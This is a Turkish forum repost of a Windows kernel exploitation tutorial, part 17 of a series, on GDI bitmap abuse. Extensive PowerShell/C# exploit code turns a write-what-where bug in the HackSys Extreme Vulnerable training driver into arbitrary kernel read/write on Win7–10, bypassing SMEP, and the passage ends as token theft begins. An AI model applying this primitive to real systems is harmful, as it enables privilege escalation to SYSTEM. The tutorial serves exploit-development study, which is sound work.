Windows Exploit Geliştirme Serisi #17 | Kernel Exploitation -> GDI Bitmap Abuse (Win7-10 32/64bit)

Qgenays

Katılımcı Üye
20 Haz 2020
255
0
Los Santos
Bölüm 17: çekirdek sömürü - > GDI Bitmap kötüye kullanımı (Win7-10 32 / 64bit)

Merhaba ve hoş geldiniz!

Bir kez daha, Hacksysteam'in sürücüsü ile ring0'a dalıyoruz.

Bu yazıda, yazma-ne-nerede güvenlik açığını gözden geçireceğiz.

Güçlü bir ring0 okuma / yazma ilkel uygulayarak, Windows 7, 8, 8.1 ve 10 (pre v1607) üzerinde çalışan ve hem 32 hem de 64 bit mimarileri hedefleyen bir istismar oluşturabiliriz!

Göreceğimiz gibi, bu teknik aslında bir veri saldırısıdır, bu yüzden acısız bir şekilde smep/SMAP/CFG/RFG => kazanmayı atlatacağız!

Bu teknik biraz "karmaşık" ve okuyucunun bazı ön bilgileri bilmesini gerektirir, bu yüzden bu yazıya başlamadan önce aşağıdaki kaynakların gözden geçirilmesini şiddetle tavsiye ederim.

Son olarak, işleri taze tutmak için 64 bit Windows 10 ana bilgisayarında istismarımızı geliştireceğiz. Yeterince tanıtım saçmalığı, hadi başlayalım!

Kaynaklar:
+ HackSysTeam-PSKernelPwn (@FuzzySec) - burada
+ Ring0 exploit primitives (@CoreSecurity) için GDI kötüye kullanımı-burada
+ Kötüye GDI Reloaded (@CoreSecurity) - burada
+ Bu sefer yazı tipi sizi 4 baytta avlıyor (@keen_lab) - burada
+ Terminus Projesi (@rwfpl) - burada

Meydan okumayı Keşfet

Bu serinin 11. bölümünden yazma-ne-nerede güvenlik açığını yeniden canlandırıyoruz, böylece tüm analizi tekrar gözden geçirmeyeceğiz.

Sadece keyfi yazımızın hala Win 10'da beklendiği gibi çalıştığından emin olmak istiyoruz.

Kod:
Add-Type -TypeDefinition @"
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Security.Principal;
  
public static class EVD
{
  [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
  public static extern IntPtr CreateFile(
    String lpFileName,
    UInt32 dwDesiredAccess,
    UInt32 dwShareMode,
    IntPtr lpSecurityAttributes,
    UInt32 dwCreationDisposition,
    UInt32 dwFlagsAndAttributes,
    IntPtr hTemplateFile);
  
  [DllImport("Kernel32.dll", SetLastError = true)]
  public static extern bool DeviceIoControl(
    IntPtr hDevice,
    int IoControlCode,
    byte[] InBuffer,
    int nInBufferSize,
    byte[] OutBuffer,
    int nOutBufferSize,
    ref int pBytesReturned,
    IntPtr Overlapped);
}
"@
 
$hDevice = [EVD]::CreateFile("\\.\HacksysExtremeVulnerableDriver", [System.IO.FileAccess]::ReadWrite, [System.IO.FileShare]::ReadWrite, [System.IntPtr]::Zero, 0x3, 0x40000080, [System.IntPtr]::Zero)
  
if ($hDevice -eq -1) {
  echo "`n[!] Unable to get driver handle..`n"
  Return
} else {
  echo "`n[>] Driver information.."
  echo "[+] lpFileName: \\.\HacksysExtremeVulnerableDriver"
  echo "[+] Handle: $hDevice"
}
 
 
[byte[]]$Buffer = [System.BitConverter]::GetBytes(0x4141414141414141) + [System.BitConverter]::GetBytes(0x4242424242424242)
echo "`n[>] Sending buffer.."
echo "[+] Buffer length: $($Buffer.Length)"
echo "[+] IOCTL: 0x22200B"
[EVD]::DeviceIoControl($hDevice, 0x22200B, $Buffer, $Buffer.Length, $null, 0, [ref]0, [System.IntPtr]::Zero) |Out-null

Aşağıda gösterildiği gibi beklenen sonucu elde ediyoruz.

x71xHQ.png11. bölümden, bunun göründüğü gibi olmadığını hatırlayabilirsiniz.

Yazdığımız değer aslında 0x414141414141414141 değil, bu adreste saklanan işaretçidir.

Ayrıca, POC sadece 64 bit üzerinde çalışır. İstismar mimarimizi başlangıçtan bağımsız tutmak için iyi bir şey yapardık!

32/64 bit üzerinde istediğimiz keyfi yazmayı elde etmek için tampon yapısını aşağıda gösterildiği gibi değiştirebiliriz

Kod:
# [IntPtr]$WriteWhatPtr->$WriteWhat + $WriteWhere
#---
[IntPtr]$WriteWhatPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal([System.BitConverter]::GetBytes($WriteWhat).Length)
[System.Runtime.InteropServices.Marshal]::Copy([System.BitConverter]::GetBytes($WriteWhat), 0, $WriteWhatPtr, [System.BitConverter]::GetBytes($WriteWhat).Length)
if ($x32Architecture) {
  [byte[]]$Buffer = [System.BitConverter]::GetBytes($WriteWhatPtr.ToInt32()) + [System.BitConverter]::GetBytes($WriteWhere)
} else {
  [byte[]]$Buffer = [System.BitConverter]::GetBytes($WriteWhatPtr.ToInt64()) + [System.BitConverter]::GetBytes($WriteWhere)
}

Uygun değişkenleri geçtiği sürece, bu artık evrensel olarak çalışmalıdır.

Pwn her şeyi!

Oyun planı

İşin kolay kısmı bu. Şimdi yapmak istediğimiz şey, tek bir keyfi yazmayı tam bir ring0 okuma/yazma ilkeline dönüştürmektir.

Yüksek düzeyde,
(1) iki bitmap nesnesi oluşturacağız,
(2) ilgili çekirdek adreslerini sızdıracağız,
(3) bitmap nesnelerinden biri için bir başlık öğesini değiştirmek için keyfi yazımızı kullanacağız ve
(4) çekirdek alanından okumak ve yazmak için GDI32 GetBitmapBits/SetBitmapBits API çağrılarını kullanacağız!

x71mQh.png


Sızan Bitmap Çekirdek Nesneleri

Bu tekniğin en önemli kısmı, bir bitmap oluştururken, çekirdekteki bitmap nesnesinin adresini sızdırabilmemizdir.

Bu sızıntı, Microsoft tarafından Windows 1607'in v10'unda (yıldönümü yaması) => crycry'de düzeltildi.

Sonuç olarak, bir bitmap oluşturulduğunda, üst işlem PEB'DE Gdisharedhandletable'a bir yapı eklenir.

Peb işleminin temel adresi göz önüne alındığında, GdiSharedHandleTable aşağıdaki uzaklıklarda bulunur (sırasıyla 32/64 bit).

Kod:
[StructLayout(LayoutKind.Explicit, Size = 256)]
public struct _PEB
{
  [FieldOffset(148)]
  public IntPtr GdiSharedHandleTable32;
  [FieldOffset(248)]
  public IntPtr GdiSharedHandleTable64;
}

Bu PEB girişi, bir dizi farklı görüntü türünü tanımlayan bir dizi GDİCELL yapısının bir işaretçisidir. Bu yapının tanımı aşağıda görülebilir.

Kod:
/// 32bit size: 0x10
/// 64bit size: 0x18
[StructLayout(LayoutKind.Sequential)]
public struct _GDI_CELL
{
  public IntPtr pKernelAddress;
  public UInt16 wProcessId;
  public UInt16 wCount;
  public UInt16 wUpper;
  public UInt16 wType;
  public IntPtr pUserAddress;
}

KD'DE _gdi_cell yapısını manuel olarak bulup bulamayacağımızı görmek için aşağıdaki POC'Yİ kullanalım.

Kod:
Add-Type -TypeDefinition @"
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Security.Principal;
  
public static class EVD
{
  [DllImport("gdi32.dll")]
  public static extern IntPtr CreateBitmap(
    int nWidth,
    int nHeight,
    uint cPlanes,
    uint cBitsPerPel,
    IntPtr lpvBits);
}
"@
 
[IntPtr]$Buffer = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(0x64*0x64*4)
$Bitmap = [EVD]::CreateBitmap(0x64, 0x64, 1, 32, $Buffer)
"{0:X}" -f [int]$Bitmap

POC'Yİ çalıştırıyoruz ve bir bitmap tanıtıcısını geri alıyoruz, hemen bunun pek çok Windows API çağrısı tarafından döndürülen standart bir tanıtıcı değeri olmadığı açık görünüyor (çok büyük).

x714Ls.png


Aslında, benim açımdan hiçbir zeka sayesinde, bitmap tutamaçlarının son iki baytı GdiSharedHandleTable dizisindeki yapının dizinidir (=>handle & 0xffff).

Bunu bilerek, KD'YE atlayalım ve yeni oluşturulan bitmap'imiz için _GDİ_CELL yapısını bulup bulamayacağımızı görelim!

x710GR.png


GdiSharedHandleTable dizisine işaretçi ile, yapmamız gereken tek şey struct dizinini struct boyutuyla (64bit'te 0x18) eklemektir.


x7KTNj.png


Process hacker, GDI nesne tanıtıcılarını listelememize izin veren çok kullanışlı bir özelliğe sahiptir.

Bunu KD'de bulduğumuz değerleri doğrulamak için kullanabiliriz.


x7KY2o.png


Sw33t! Ring0 ilkelimiz için, bu bilgiyi iki bitmapler (bir yönetici ve bir işçi) için programlı olarak toplamamız gerekir.

Görebildiğimiz gibi, bitmap tanıtıcısına dayanan basit bir matematik.

Tek soru, peb süreci için temel adresi nasıl alacağımızdır.

Neyse ki belgesiz, Ntqueryınformationprocess işlevi kurtarmaya geliyor.

Processbasicınformation sınıfı (0x0) ile çağrıldığında, işlev PEB'NİN temel adresini içeren bir yapı döndürür.

İyi anlaşılmış bir teknik olduğu için bu konuda daha fazla ayrıntıya girmeyeceğim, umarım aşağıdaki POC herhangi bir şüpheyi giderecektir!

Kod:
Add-Type -TypeDefinition @"
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Security.Principal;
 
[StructLayout(LayoutKind.Sequential)]
public struct _PROCESS_BASIC_INFORMATION
{
  public IntPtr ExitStatus;
  public IntPtr PebBaseAddress;
  public IntPtr AffinityMask;
  public IntPtr BasePriority;
  public UIntPtr UniqueProcessId;
  public IntPtr InheritedFromUniqueProcessId;
}
 
/// Partial _PEB
[StructLayout(LayoutKind.Explicit, Size = 256)]
public struct _PEB
{
  [FieldOffset(148)]
  public IntPtr GdiSharedHandleTable32;
  [FieldOffset(248)]
  public IntPtr GdiSharedHandleTable64;
}
 
[StructLayout(LayoutKind.Sequential)]
public struct _GDI_CELL
{
  public IntPtr pKernelAddress;
  public UInt16 wProcessId;
  public UInt16 wCount;
  public UInt16 wUpper;
  public UInt16 wType;
  public IntPtr pUserAddress;
}
 
public static class EVD
{
  [DllImport("ntdll.dll")]
  public static extern int NtQueryInformationProcess(
    IntPtr processHandle, 
    int processInformationClass,
    ref _PROCESS_BASIC_INFORMATION processInformation,
    int processInformationLength,
    ref int returnLength);
 
  [DllImport("gdi32.dll")]
  public static extern IntPtr CreateBitmap(
    int nWidth,
    int nHeight,
    uint cPlanes,
    uint cBitsPerPel,
    IntPtr lpvBits);
}
"@
 
#==============================================[PEB]
 
# Flag architecture $x32Architecture/!$x32Architecture
if ([System.IntPtr]::Size -eq 4) {
  echo "`n[>] Target is 32-bit!"
  $x32Architecture = 1
} else {
  echo "`n[>] Target is 64-bit!"
}
# Current Proc handle
$ProcHandle = (Get-Process -Id ([System.Diagnostics.Process]::GetCurrentProcess().Id)).Handle
# Process Basic Information
$PROCESS_BASIC_INFORMATION = New-Object _PROCESS_BASIC_INFORMATION
$PROCESS_BASIC_INFORMATION_Size = [System.Runtime.InteropServices.Marshal]::SizeOf($PROCESS_BASIC_INFORMATION)
$returnLength = New-Object Int
$CallResult = [EVD]::NtQueryInformationProcess($ProcHandle, 0, [ref]$PROCESS_BASIC_INFORMATION, $PROCESS_BASIC_INFORMATION_Size, [ref]$returnLength)
# PID & PEB address
echo "`n[?] PID $($PROCESS_BASIC_INFORMATION.UniqueProcessId)"
if ($x32Architecture) {
  echo "[+] PebBaseAddress: 0x$("{0:X8}" -f $PROCESS_BASIC_INFORMATION.PebBaseAddress.ToInt32())"
} else {
  echo "[+] PebBaseAddress: 0x$("{0:X16}" -f $PROCESS_BASIC_INFORMATION.PebBaseAddress.ToInt64())"
}
# Lazy PEB parsing
$_PEB = New-Object _PEB
$_PEB = $_PEB.GetType()
$BufferOffset = $PROCESS_BASIC_INFORMATION.PebBaseAddress.ToInt64()
$NewIntPtr = New-Object System.Intptr -ArgumentList $BufferOffset
$PEBFlags = [system.runtime.interopservices.marshal]::PtrToStructure($NewIntPtr, [type]$_PEB)
# GdiSharedHandleTable
if ($x32Architecture) {
  echo "[+] GdiSharedHandleTable: 0x$("{0:X8}" -f $PEBFlags.GdiSharedHandleTable32.ToInt32())"
} else {
  echo "[+] GdiSharedHandleTable: 0x$("{0:X16}" -f $PEBFlags.GdiSharedHandleTable64.ToInt64())"
}
# _GDI_CELL size
$_GDI_CELL = New-Object _GDI_CELL
$_GDI_CELL_Size = [System.Runtime.InteropServices.Marshal]::SizeOf($_GDI_CELL)
 
#==============================================[/PEB]
 
#==============================================[Bitmap]
 
echo "`n[>] Creating Bitmaps.."
 
# Manager Bitmap
[IntPtr]$Buffer = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(0x64*0x64*4)
$ManagerBitmap = [EVD]::CreateBitmap(0x64, 0x64, 1, 32, $Buffer)
echo "[+] Manager BitMap handle: 0x$("{0:X}" -f [int]$ManagerBitmap)"
if ($x32Architecture) {
  $HandleTableEntry = $PEBFlags.GdiSharedHandleTable32.ToInt32() + ($($ManagerBitmap -band 0xffff)*$_GDI_CELL_Size)
  echo "[+] HandleTableEntry: 0x$("{0:X}" -f [UInt32]$HandleTableEntry)"
  $ManagerKernelObj = [System.Runtime.InteropServices.Marshal]::ReadInt32($HandleTableEntry)
  echo "[+] Bitmap Kernel address: 0x$("{0:X8}" -f $([System.Runtime.InteropServices.Marshal]::ReadInt32($HandleTableEntry)))"
} else {
  $HandleTableEntry = $PEBFlags.GdiSharedHandleTable64.ToInt64() + ($($ManagerBitmap -band 0xffff)*$_GDI_CELL_Size)
  echo "[+] HandleTableEntry: 0x$("{0:X}" -f [UInt64]$HandleTableEntry)"
  $ManagerKernelObj = [System.Runtime.InteropServices.Marshal]::ReadInt64($HandleTableEntry)
  echo "[+] Bitmap Kernel address: 0x$("{0:X16}" -f $([System.Runtime.InteropServices.Marshal]::ReadInt64($HandleTableEntry)))"
}
 
# Worker Bitmap
[IntPtr]$Buffer = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(0x64*0x64*4)
$WorkerBitmap = [EVD]::CreateBitmap(0x64, 0x64, 1, 32, $Buffer)
echo "[+] Worker BitMap handle: 0x$("{0:X}" -f [int]$WorkerBitmap)"
if ($x32Architecture) {
  $HandleTableEntry = $PEBFlags.GdiSharedHandleTable32.ToInt32() + ($($WorkerBitmap -band 0xffff)*$_GDI_CELL_Size)
  echo "[+] HandleTableEntry: 0x$("{0:X}" -f [UInt32]$HandleTableEntry)"
  $WorkerKernelObj = [System.Runtime.InteropServices.Marshal]::ReadInt32($HandleTableEntry)
  echo "[+] Bitmap Kernel address: 0x$("{0:X8}" -f $([System.Runtime.InteropServices.Marshal]::ReadInt32($HandleTableEntry)))"
} else {
  $HandleTableEntry = $PEBFlags.GdiSharedHandleTable64.ToInt64() + ($($WorkerBitmap -band 0xffff)*$_GDI_CELL_Size)
  echo "[+] HandleTableEntry: 0x$("{0:X}" -f [UInt64]$HandleTableEntry)"
  $WorkerKernelObj = [System.Runtime.InteropServices.Marshal]::ReadInt64($HandleTableEntry)
  echo "[+] Bitmap Kernel address: 0x$("{0:X16}" -f $([System.Runtime.InteropServices.Marshal]::ReadInt64($HandleTableEntry)))"
}
 
#==============================================[/Bitmap]

x7KURq.png


Komut dosyamızın mimariden bağımsız olduğuna dikkat edin!

Bu çözülen bulmacanın bir parçası, ama neden bu bitmap nesnelerini önemsiyoruz?

_BASEOBJECT -> _SURFOBJ -> pvScan0

Yukarıda sızdırdığımız bitmap çekirdek adresi, çekirdek alanındaki aşağıdaki GDI temel nesne yapısına işaret eder.

Kod:
/// 32bit size: 0x10
/// 64bit size: 0x18
[StructLayout(LayoutKind.Sequential)]
public struct _BASEOBJECT
{
  public IntPtr hHmgr;
  public UInt32 ulShareCount;
  public UInt16 cExclusiveLock;
  public UInt16 BaseFlags;
  public UIntPtr Tid;
}

Temel nesne yapısını daha ayrıntılı olarak incelemek istiyorsanız, lütfen ReactOS wiki'ye bakın.

Bu başlıktan hemen sonra, nesnenin türüne göre değişen belirli bir yapı vardır.

Bitmapler için bu, aşağıda görülebilen yüzey nesnesi yapısıdır.

Kod:
/// 32bit size: 0x34
/// 64bit size: 0x50
[StructLayout(LayoutKind.Sequential)]
public struct _SURFOBJ
{
  public IntPtr dhsurf;
  public IntPtr hsurf;
  public IntPtr dhpdev;
  public IntPtr hdev;
  public IntPtr sizlBitmap;
  public UIntPtr cjBits;
  public IntPtr pvBits;
  public IntPtr pvScan0; /// offset => 32bit = 0x20 & 64bit = 0x38
  public UInt32 lDelta;
  public UInt32 iUniq;
  public UInt32 iBitmapFormat;
  public UInt16 iType;
  public UInt16 fjBitmap;
}

PvScan0 elemanı istediğimiz şey!

Bu öğe, bitmap'in ilk tarama satırına bir işaretçidir.

Sızan çekirdek adresimizden, bu öğenin ofsetini hesaplamak için aşağıdakileri kullanabiliriz.

Kod:
# 32 bit
[IntPtr]pvScan0_32 = $pKernelAddress + 0x30
 
# 64 bit
[IntPtr]pvScan0_64 = $pKernelAddress + 0x50

Yine de soru şu ki, neden umursuyoruz?

Eh, bu öğenin değeri üzerinde doğrudan çalışan iki GDI32 API çağrısı, GetBitmapBits ve SetBitmapBits vardır. GetBitmapBits, pvScan0 adresinde keyfi bir bayt miktarını okumamıza izin verirken, SetBitmapBits pvScan0 adresinde keyfi bir bayt miktarını yazmamıza izin verir.

Pwnajın kokusunu alabiliyor musun?

Poc'yi, yönetici ve çalışan bit eşlemleri için pvScan0 ofsetlerini içerecek şekilde kısaca güncelleyebiliriz.

Kod:
# 32 bit
# IntPtr at $HandleTableEntry = pKernelAddress
$BitmapScan0_32 = $([System.Runtime.InteropServices.Marshal]::ReadInt32($HandleTableEntry)) + 0x30
 
# 64 bit
# IntPtr at $HandleTableEntry = pKernelAddress
$BitmapScan0_64 = $([System.Runtime.InteropServices.Marshal]::ReadInt64($HandleTableEntry)) + 0x50

GDI ring0 primitive(ilkel)


Şu andan itibaren ring0 ilkel çalışma almak oldukça kolaydır.

Temel olarak, keyfi yazımızı kullanarak, "yönetici" bitmapinin pvScan0 adresini "işçi" bitmapinin pvScan0 adresine işaret edecek şekilde ayarlamak istiyoruz.

Şimdiye kadar yaptığımız her şeyi bir araya getirerek, bir sonraki POC ile geldik.

Kod:
Add-Type -TypeDefinition @"
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Security.Principal;
 
[StructLayout(LayoutKind.Sequential)]
public struct _PROCESS_BASIC_INFORMATION
{
  public IntPtr ExitStatus;
  public IntPtr PebBaseAddress;
  public IntPtr AffinityMask;
  public IntPtr BasePriority;
  public UIntPtr UniqueProcessId;
  public IntPtr InheritedFromUniqueProcessId;
}
 
/// Partial _PEB
[StructLayout(LayoutKind.Explicit, Size = 256)]
public struct _PEB
{
  [FieldOffset(148)]
  public IntPtr GdiSharedHandleTable32;
  [FieldOffset(248)]
  public IntPtr GdiSharedHandleTable64;
}
 
[StructLayout(LayoutKind.Sequential)]
public struct _GDI_CELL
{
  public IntPtr pKernelAddress;
  public UInt16 wProcessId;
  public UInt16 wCount;
  public UInt16 wUpper;
  public UInt16 wType;
  public IntPtr pUserAddress;
}
 
public static class EVD
{
  [DllImport("ntdll.dll")]
  public static extern int NtQueryInformationProcess(
    IntPtr processHandle, 
    int processInformationClass,
    ref _PROCESS_BASIC_INFORMATION processInformation,
    int processInformationLength,
    ref int returnLength);
 
  [DllImport("gdi32.dll")]
  public static extern IntPtr CreateBitmap(
    int nWidth,
    int nHeight,
    uint cPlanes,
    uint cBitsPerPel,
    IntPtr lpvBits);
 
  [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
  public static extern IntPtr CreateFile(
    String lpFileName,
    UInt32 dwDesiredAccess,
    UInt32 dwShareMode,
    IntPtr lpSecurityAttributes,
    UInt32 dwCreationDisposition,
    UInt32 dwFlagsAndAttributes,
    IntPtr hTemplateFile);
  
  [DllImport("Kernel32.dll", SetLastError = true)]
  public static extern bool DeviceIoControl(
    IntPtr hDevice,
    int IoControlCode,
    byte[] InBuffer,
    int nInBufferSize,
    byte[] OutBuffer,
    int nOutBufferSize,
    ref int pBytesReturned,
    IntPtr Overlapped);
}
"@
 
#==============================================[PEB]
 
# Flag architecture $x32Architecture/!$x32Architecture
if ([System.IntPtr]::Size -eq 4) {
  echo "`n[>] Target is 32-bit!"
  $x32Architecture = 1
} else {
  echo "`n[>] Target is 64-bit!"
}
# Current Proc handle
$ProcHandle = (Get-Process -Id ([System.Diagnostics.Process]::GetCurrentProcess().Id)).Handle
# Process Basic Information
$PROCESS_BASIC_INFORMATION = New-Object _PROCESS_BASIC_INFORMATION
$PROCESS_BASIC_INFORMATION_Size = [System.Runtime.InteropServices.Marshal]::SizeOf($PROCESS_BASIC_INFORMATION)
$returnLength = New-Object Int
$CallResult = [EVD]::NtQueryInformationProcess($ProcHandle, 0, [ref]$PROCESS_BASIC_INFORMATION, $PROCESS_BASIC_INFORMATION_Size, [ref]$returnLength)
# PID & PEB address
echo "`n[?] PID $($PROCESS_BASIC_INFORMATION.UniqueProcessId)"
if ($x32Architecture) {
  echo "[+] PebBaseAddress: 0x$("{0:X8}" -f $PROCESS_BASIC_INFORMATION.PebBaseAddress.ToInt32())"
} else {
  echo "[+] PebBaseAddress: 0x$("{0:X16}" -f $PROCESS_BASIC_INFORMATION.PebBaseAddress.ToInt64())"
}
# Lazy PEB parsing
$_PEB = New-Object _PEB
$_PEB = $_PEB.GetType()
$BufferOffset = $PROCESS_BASIC_INFORMATION.PebBaseAddress.ToInt64()
$NewIntPtr = New-Object System.Intptr -ArgumentList $BufferOffset
$PEBFlags = [system.runtime.interopservices.marshal]::PtrToStructure($NewIntPtr, [type]$_PEB)
# GdiSharedHandleTable
if ($x32Architecture) {
  echo "[+] GdiSharedHandleTable: 0x$("{0:X8}" -f $PEBFlags.GdiSharedHandleTable32.ToInt32())"
} else {
  echo "[+] GdiSharedHandleTable: 0x$("{0:X16}" -f $PEBFlags.GdiSharedHandleTable64.ToInt64())"
}
# _GDI_CELL size
$_GDI_CELL = New-Object _GDI_CELL
$_GDI_CELL_Size = [System.Runtime.InteropServices.Marshal]::SizeOf($_GDI_CELL)
 
#==============================================[/PEB]
 
#==============================================[Bitmap]
 
echo "`n[>] Creating Bitmaps.."
 
# Manager Bitmap
[IntPtr]$Buffer = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(0x64*0x64*4)
$ManagerBitmap = [EVD]::CreateBitmap(0x64, 0x64, 1, 32, $Buffer)
echo "[+] Manager BitMap handle: 0x$("{0:X}" -f [int]$ManagerBitmap)"
if ($x32Architecture) {
  $HandleTableEntry = $PEBFlags.GdiSharedHandleTable32.ToInt32() + ($($ManagerBitmap -band 0xffff)*$_GDI_CELL_Size)
  echo "[+] HandleTableEntry: 0x$("{0:X}" -f [UInt32]$HandleTableEntry)"
  $ManagerKernelObj = [System.Runtime.InteropServices.Marshal]::ReadInt32($HandleTableEntry)
  echo "[+] Bitmap Kernel address: 0x$("{0:X8}" -f $([System.Runtime.InteropServices.Marshal]::ReadInt32($HandleTableEntry)))"
  $ManagerpvScan0 = $([System.Runtime.InteropServices.Marshal]::ReadInt32($HandleTableEntry)) + 0x30
  echo "[+] Manager pvScan0 pointer: 0x$("{0:X8}" -f $($([System.Runtime.InteropServices.Marshal]::ReadInt32($HandleTableEntry)) + 0x30))"
} else {
  $HandleTableEntry = $PEBFlags.GdiSharedHandleTable64.ToInt64() + ($($ManagerBitmap -band 0xffff)*$_GDI_CELL_Size)
  echo "[+] HandleTableEntry: 0x$("{0:X}" -f [UInt64]$HandleTableEntry)"
  $ManagerKernelObj = [System.Runtime.InteropServices.Marshal]::ReadInt64($HandleTableEntry)
  echo "[+] Bitmap Kernel address: 0x$("{0:X16}" -f $([System.Runtime.InteropServices.Marshal]::ReadInt64($HandleTableEntry)))"
  $ManagerpvScan0 = $([System.Runtime.InteropServices.Marshal]::ReadInt64($HandleTableEntry)) + 0x50
  echo "[+] Manager pvScan0 pointer: 0x$("{0:X16}" -f $($([System.Runtime.InteropServices.Marshal]::ReadInt64($HandleTableEntry)) + 0x50))"
}
 
# Worker Bitmap
[IntPtr]$Buffer = [System.Runtime.InteropServices.Marshal]::AllocHGlobal(0x64*0x64*4)
$WorkerBitmap = [EVD]::CreateBitmap(0x64, 0x64, 1, 32, $Buffer)
echo "[+] Worker BitMap handle: 0x$("{0:X}" -f [int]$WorkerBitmap)"
if ($x32Architecture) {
  $HandleTableEntry = $PEBFlags.GdiSharedHandleTable32.ToInt32() + ($($WorkerBitmap -band 0xffff)*$_GDI_CELL_Size)
  echo "[+] HandleTableEntry: 0x$("{0:X}" -f [UInt32]$HandleTableEntry)"
  $WorkerKernelObj = [System.Runtime.InteropServices.Marshal]::ReadInt32($HandleTableEntry)
  echo "[+] Bitmap Kernel address: 0x$("{0:X8}" -f $([System.Runtime.InteropServices.Marshal]::ReadInt32($HandleTableEntry)))"
  $WorkerpvScan0 = $([System.Runtime.InteropServices.Marshal]::ReadInt32($HandleTableEntry)) + 0x30
  echo "[+] Worker pvScan0 pointer: 0x$("{0:X8}" -f $($([System.Runtime.InteropServices.Marshal]::ReadInt32($HandleTableEntry)) + 0x30))"
} else {
  $HandleTableEntry = $PEBFlags.GdiSharedHandleTable64.ToInt64() + ($($WorkerBitmap -band 0xffff)*$_GDI_CELL_Size)
  echo "[+] HandleTableEntry: 0x$("{0:X}" -f [UInt64]$HandleTableEntry)"
  $WorkerKernelObj = [System.Runtime.InteropServices.Marshal]::ReadInt64($HandleTableEntry)
  echo "[+] Bitmap Kernel address: 0x$("{0:X16}" -f $([System.Runtime.InteropServices.Marshal]::ReadInt64($HandleTableEntry)))"
  $WorkerpvScan0 = $([System.Runtime.InteropServices.Marshal]::ReadInt64($HandleTableEntry)) + 0x50
  echo "[+] Worker pvScan0 pointer: 0x$("{0:X16}" -f $($([System.Runtime.InteropServices.Marshal]::ReadInt64($HandleTableEntry)) + 0x50))"
}
 
#==============================================[/Bitmap]
 
#==============================================[GDI ring0 primitive]
 
$hDevice = [EVD]::CreateFile("\\.\HacksysExtremeVulnerableDriver", [System.IO.FileAccess]::ReadWrite, [System.IO.FileShare]::ReadWrite, [System.IntPtr]::Zero, 0x3, 0x40000080, [System.IntPtr]::Zero)
  
if ($hDevice -eq -1) {
  echo "`n[!] Unable to get driver handle..`n"
  Return
} else {
  echo "`n[>] Driver information.."
  echo "[+] lpFileName: \\.\HacksysExtremeVulnerableDriver"
  echo "[+] Handle: $hDevice"
}
 
# [IntPtr]$WriteWhatPtr->$WriteWhat + $WriteWhere
#---
[IntPtr]$WriteWhatPtr = [System.Runtime.InteropServices.Marshal]::AllocHGlobal([System.BitConverter]::GetBytes($WorkerpvScan0).Length)
[System.Runtime.InteropServices.Marshal]::Copy([System.BitConverter]::GetBytes($WorkerpvScan0), 0, $WriteWhatPtr, [System.BitConverter]::GetBytes($WorkerpvScan0).Length)
if ($x32Architecture) {
  [byte[]]$Buffer = [System.BitConverter]::GetBytes($WriteWhatPtr.ToInt32()) + [System.BitConverter]::GetBytes($ManagerpvScan0)
} else {
  [byte[]]$Buffer = [System.BitConverter]::GetBytes($WriteWhatPtr.ToInt64()) + [System.BitConverter]::GetBytes($ManagerpvScan0)
}
echo "`n[>] Sending buffer.."
echo "[+] Buffer length: $($Buffer.Length)"
echo "[+] IOCTL: 0x22200B"
[EVD]::DeviceIoControl($hDevice, 0x22200B, $Buffer, $Buffer.Length, $null, 0, [ref]0, [System.IntPtr]::Zero) |Out-null
 
#==============================================[/GDI ring0 primitive]

Yeni POC'yi çalıştıralım ve KD'deki pvScan0 girişlerini inceleyelim.

x7q6uc.png


x7q0JN.png


Yukarıda, aslında resuable okuma/çekirdek yazmak alma yöneticisi işaretçisi bizim görüntüden görüldüğü gibi. Bu bit eşlemleri kullanarak veri okuma ve yazma işlemi aşağıda görülebilir.

Kod:
# Arbitrary kernel read
(1) GDI32::SetBitmapBits(Address)  -> Manager # This updates the workers pvScan0 pointer
(2) GDI32::GetBitmapBits(Byte Count) -> Worker  # Reads X bytes from Address

# Arbitrary kernel write
(1) GDI32::SetBitmapBits(Address)  -> Manager # This updates the workers pvScan0 pointer
(2) GDI32::SetBitmapBits(Value)   -> Worker  # Writes X bytes to Address

Bunu sindirmek için biraz zaman ayırın, kuşkusuz ilk başta biraz kafa karıştırıcıdır. Kolaylık sağlamak için, ıntptr boyutlu okuma/yazma işlemlerini şeffaf bir şekilde yapmak için aşağıdaki yardımcı işlevleri oluşturdum.

Kod:
# Arbitrary Kernel read
function Bitmap-Read {
  param ($Address)
  $CallResult = [EVD]::SetBitmapBits($ManagerBitmap, [System.IntPtr]::Size, [System.BitConverter]::GetBytes($Address))
  [IntPtr]$Pointer = [EVD]::VirtualAlloc([System.IntPtr]::Zero, [System.IntPtr]::Size, 0x3000, 0x40)
  $CallResult = [EVD]::GetBitmapBits($WorkerBitmap, [System.IntPtr]::Size, $Pointer)
  if ($x32Architecture){
    [System.Runtime.InteropServices.Marshal]::ReadInt32($Pointer)
  } else {
    [System.Runtime.InteropServices.Marshal]::ReadInt64($Pointer)
  }
  $CallResult = [EVD]::VirtualFree($Pointer, [System.IntPtr]::Size, 0x8000)
}
 
# Arbitrary Kernel write
function Bitmap-Write {
  param ($Address, $Value)
  $CallResult = [EVD]::SetBitmapBits($ManagerBitmap, [System.IntPtr]::Size, [System.BitConverter]::GetBytes($Address))
  $CallResult = [EVD]::SetBitmapBits($WorkerBitmap, [System.IntPtr]::Size, [System.BitConverter]::GetBytes($Value))
}

Sistem belirtecini çoğaltma

Çekirdek alanında keyfi bir okuma / yazma ile hala sistemi nasıl alacağımızı bulmamız gerekiyor.

SMEP (shellcode kullanıcı ülkesinden çalıştırmamızı engelleyen) gibi çok sayıda gelişmiş azaltma ile 64bit Windows 10 üzerinde olduğumuzu unutmayın.

Verileri zaten özgürce kopyalayabildiğimiz için, yürütme süreci bloğuna (EPROCESS) bir veri saldırısı denemek uygun görünüyor.

EPROCESS yapısı bir işlem belirteci içerir,bu belirteç işlemin güvenlik bağlamını açıklar ve işlemle ilişkili hesabın kimliğini ve ayrıcalıklarını içerir.

